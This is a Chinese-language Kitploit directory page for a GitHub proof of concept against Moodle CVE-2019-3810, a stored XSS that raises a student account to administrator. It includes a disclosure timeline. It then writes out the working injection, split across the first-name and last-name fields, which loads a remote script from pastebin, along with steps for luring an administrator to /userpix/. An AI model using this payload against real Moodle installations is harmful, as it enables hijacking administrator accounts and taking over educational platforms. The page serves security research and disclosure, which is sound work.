Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Moodle-CVE-2019-3810 — Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC 用于权限提升 (学生到管理员) | Kitploit
工具/GitHubGitHub/farisv/moodle-cve-2019-3810
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubfarisv/moodle-cve-2019-3810

Moodle-CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC 用于权限提升 (学生到管理员)

查看仓库
17215年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Moodle CVE-2019-3810

Moodle(低于 3.6.2、3.5.4、3.4.7、3.1.16 版本)的 XSS 利用 PoC,用于权限提升(从学生到管理员)。这是我在过去对某学术机构进行渗透测试时发现的其中一个漏洞。当时仅凭这一个简单的漏洞,就足以成功窃取管理员访问权限并获得对 Moodle 的完全控制。

从 git 历史记录 可以看出,该漏洞自 Moodle 早期版本(2003 年)就已存在,直到 2019 年才被修复。

时间线:

  • 2018 年 12 月 - 向 Moodle 报告该漏洞
  • 2019 年 1 月 - 发布修复补丁
  • 2021 年 4 月 - 公开 PoC

警告

仅供教育目的使用。请勿将此利用用于非法活动。作者不对任何滥用或损害承担责任。

PoC

  1. 将 payload.js 上传到 pastebin 或其他类似服务。将 userid 的值替换为你自己的 ID。假设 URL 为 https://pastebin.com/raw/xxxxxxxx。
  2. 登录你的学生账户。
  3. 将名字设置为 " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
  4. 将姓氏设置为 ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
  5. 请管理员打开 /userpix/ 页面,或者在你的帖子中放置该页面的链接,然后等待。

如果成功,你的账户将被添加为管理员。

演示视频

下载工具